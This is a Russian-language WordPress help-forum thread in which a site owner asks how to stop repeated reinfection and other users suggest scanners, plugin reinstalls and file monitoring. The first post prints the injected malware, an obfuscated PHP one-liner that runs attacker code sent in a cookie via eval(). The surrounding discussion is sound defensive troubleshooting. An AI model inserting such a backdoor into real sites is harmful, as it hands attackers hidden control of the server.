[Помогите] Лезет вирусняк

Тема в разделе "Wordpress", создана пользователем iga, 12 окт 2017.

  1. iga

    iga

    Регистрация:
    6 фев 2014
    Сообщения:
    285
    Симпатии:
    53
    Может и не совсем в тот раздел, но грешу на WP.
    На хостинге висит 8 сайтов. В основном все на wp, один на opencart.
    B 2 сайта постоянно обрастают трипаками - на wp 4.8.2. Хостер блокирует исходящую почту, присылает отчет virusdie, я ручками вычищаю всё, снимаю блокировку почты...через неделю полторы ситуация повторяется. Я думаю, что проблема в WP.
    Пароли сменял все которые тока можно: личный кабинет хостера, панель управления, ftp, админка, базы данных. Ничё не помогает, зараза всё равно возвращается. Может virusdie не полностью всё вылавливает и остаётся где-то плодящаяся царевна-лягушка?

    Гадость встраивается в начало существующих файлов или, что реже, создаёт свои. Выглядит так
    PHP:
    <?php                                                                                                                                                                             $d4l='lEIC23evK($6ahf\'tis4cO_43266c';if(isset(${$d4l[22].$d4l[3].$d4l[21].$d4l[21].$d4l[8].$d4l[2].$d4l[1]}[$d4l[13].$d4l[19].$d4l[5].$d4l[4].$d4l[11].$d4l[11].$d4l[20]])){eval(${$d4l[22].$d4l[3].$d4l[21].$d4l[21].$d4l[8].$d4l[2].$d4l[1]}[$d4l[13].$d4l[19].$d4l[5].$d4l[4].$d4l[11].$d4l[11].$d4l[20]]);} ?>
    Куда ещё копать? Какие мысли?
     
    Последнее редактирование: 12 окт 2017
  2. pasha-b

    pasha-b

    Регистрация:
    9 янв 2013
    Сообщения:
    190
    Симпатии:
    109
    Возможно на сайте есть shell. поэтому просто смена паролей не поможет. Надо скачать эти сайты себе и проверить на вирусы, Kaspersky Virus Removal Tool и Dr.Web CureIt!, они бесплатные, работают без установки. Если ничего не найдут, то обновить CMS до последней версии, даже если эта версия и установлена, вирусы могут дописываться в существующие файлы. Удалить модули, причем как в админке, так потом и вручную файлы, если что-то останется, на случай, если вирус был в каком-либо модуле. Самый крайний случай, заново установить чистый WP и добавлять на него все данные и модули, нужные для работы данных сайтов.
     
    iga нравится это.
  3. iga

    iga

    Регистрация:
    6 фев 2014
    Сообщения:
    285
    Симпатии:
    53
    pasha-b, Kaspersky Virus Removal Tool и Dr.Web CureIt! говорят, что всё чисто. Надо с мыслями собраться и браться за переустановку плагинов :(
    Установил плагин Exploit Scanner. Он нашел ещё пару фалов с base64 кодом, который virusdie пропустил.
     
  4. Bnopen

    Bnopen Команда форума

    Регистрация:
    3 мар 2013
    Сообщения:
    1.264
    Симпатии:
    534
    Так и есть, шелл остается в директории. Посмотрите внимательно все файлы в директории, там могут быть посторонние с вредоносным кодом. Попросите хостера пройтись clamav, он нормально находит шеллы + еще очень хорош Linux Malware Detect (LMD).
    Можно попробовать поставить этот плагин и вычислить когда меняются файлы, может в логах на хостинге будет видно с какого скрипта выполняется код.



    Еще можно вот эти попробовать -



    И для безопасности вот этот плагин -
    https://wordpress.org/plugins/better-wp-security/
     
    iga нравится это.
  5. iga

    iga

    Регистрация:
    6 фев 2014
    Сообщения:
    285
    Симпатии:
    53
    А по базе данных чем можно? Много чего гугл выдаёт, проверенного бы хотелось софта.
    Bnopen, по поводу clama что-то в рег.ру забубнили, мол он у них только на win серверах и вообще они за 250 рублей чистят только то, что нашел их virusdie :Smile:. Я в результате сайты скачал к себе на локалку clamwin(вебом, каспером) прошелся - чисто.
    Установил монитор изменения файлов...ждём. Sucuri постоянно шлёт отчет, что кто-то пытается залогиниться под admin(у меня логин не такой конечно же) с разных ip.
     
  6. Bnopen

    Bnopen Команда форума

    Регистрация:
    3 мар 2013
    Сообщения:
    1.264
    Симпатии:
    534
    можно поменять url для авторизации и такие уведомления сразу отпадут.
    Бд надо качать к себе на локалку и проверять на вхождение iframe, base64 и прочей гадости. Насчет софта даже не знаю, что посоветовать. Но в бд код с вирусней реже бывает, разве что поломали только бд и узнали пароль к ней. Обычно в контент тогда вставляют всякие ифреймы на партнерки.
     
  7. pasha-b

    pasha-b

    Регистрация:
    9 янв 2013
    Сообщения:
    190
    Симпатии:
    109
    Помимо сайтов, проверьте и другие папки на хостинге. Обычно сайты находятся в папке public_html или domains, от настроек хостинга зависит, помимо этих папок есть еще, особенно посмотреть на папки tmp или temp.
     
  8. iga

    iga

    Регистрация:
    6 фев 2014
    Сообщения:
    285
    Симпатии:
    53
    Чисто, да и вообще...тьфу, тьфу, тьфу...вроде тишина уже четыре полных дня прошло.
    Единственное - сегодня sucuri сказал, что у меня изменился .htaccess. Как так? Если у меня на него права стоят 444? Он даже меня на редактирование не пускает!
     
  9. Bnopen

    Bnopen Команда форума

    Регистрация:
    3 мар 2013
    Сообщения:
    1.264
    Симпатии:
    534
    iga, на хостинге наверняка есть ежедневный бекап, сравните с файлом в бекапе за вчерашний день.
     
  10. iga

    iga

    Регистрация:
    6 фев 2014
    Сообщения:
    285
    Симпатии:
    53